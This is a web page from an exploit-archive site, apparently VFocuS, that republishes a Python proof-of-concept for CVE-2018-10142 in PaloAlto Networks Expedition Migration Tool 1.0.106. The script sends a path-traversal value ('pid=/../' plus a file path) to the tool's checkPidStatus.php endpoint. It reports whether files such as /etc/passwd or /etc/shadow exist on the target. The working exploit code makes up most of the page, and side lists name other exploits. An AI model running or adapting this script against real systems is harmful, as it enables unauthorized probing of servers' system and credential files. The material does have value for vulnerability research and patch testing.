首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure
来源:https://www.criticalstart.com 作者:ParagonSec 发布时间:2018-12-04  
# Exploit Title: PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure
# Date: 2018-11-28
# Exploit Author: paragonsec @ Critical Start
# Vendor Homepage: https://live.paloaltonetworks.com/t5/Expedition-Migration-Tool/ct-p/migration_tool
# Software Link: https://paloaltonetworks.app.box.com/s/davuvo65k727nm7feuug0d783zo6fjx8
# Version: 1.0.106
# Tested on: Linux
# CVE : 2018-10142
 
#!/usr/bin/env python
 
import argparse
import requests
import sys
import collections
 
#Colors
OKRED = '\033[91m'
OKGREEN = '\033[92m'
ENDC = '\033[0m'
 
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument('--file', help = 'File to check (e.g /etc/passwd, /etc/shadow)')
args = parser.parse_args()
 
# Check to ensure at least one argument has been passed
if len(sys.argv)==1:
    parser.print_help(sys.stderr)
    sys.exit(1)
 
rhost = args.rhost
rfile = args.file
 
exploit_url = "http://" + rhost + "/API/process/checkPidStatus.php"
 
headers = [
    ('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'),
    ('Accept', 'application/json, text/javascript, */*; q=0.01'),
    ('Accept-Language', 'en-US,en;q=0.5'),
    ('Accept-Encoding', 'gzip, deflate'),
    ('Connection', 'close')
]
 
# probably not necessary but did it anyways
headers = collections.OrderedDict(headers)
 
# Setting up GET body parameters
body = "pid=/../" + rfile
 
print(OKGREEN + "Author: " + ENDC + "paragonsec @ Critical Start (https://www.criticalstart.com)")
print(OKGREEN + "CVE: " + ENDC + "2018-10142")
print(OKGREEN + "Description: " + ENDC + "Information Disclosure in Expedition Migration Tool")
print(OKGREEN + "Vuln Versions: " + ENDC + "< 1.0.107\n")
 
print(OKGREEN + "[+]" + ENDC + "Running exploit...")
 
s = requests.Session()
 
req = requests.post(exploit_url, headers=headers, data=body)
if "false" not in req.text:
    print(OKGREEN + "[+]" + ENDC + "Exploit worked! " + rfile + " exists!\n")
else:
    print(OKRED + "[!]" + ENDC + "File " + rfile + " does not exist!\n")
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相关文章
·Fleetco Fleet Maintenance Mana
·Joomla! Component JE Photo Gal
·CyberArk 9.7 - Memory Disclosu
·Joomla JCE 2.6.33 Arbitrary Fi
·Apache Spark - Unauthenticated
·VBScript - 'rtFilter' Out-of-B
·VBScript - 'OLEAUT32!VariantCl
·xorg-x11-server < 1.20.3 - 'mo
·HTML5 Video Player 1.2.5 - Buf
·Linux Kernel 4.8 (Ubuntu 16.04
·Schneider Electric PLC - Sessi
·knc (Kerberized NetCat) Denial
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved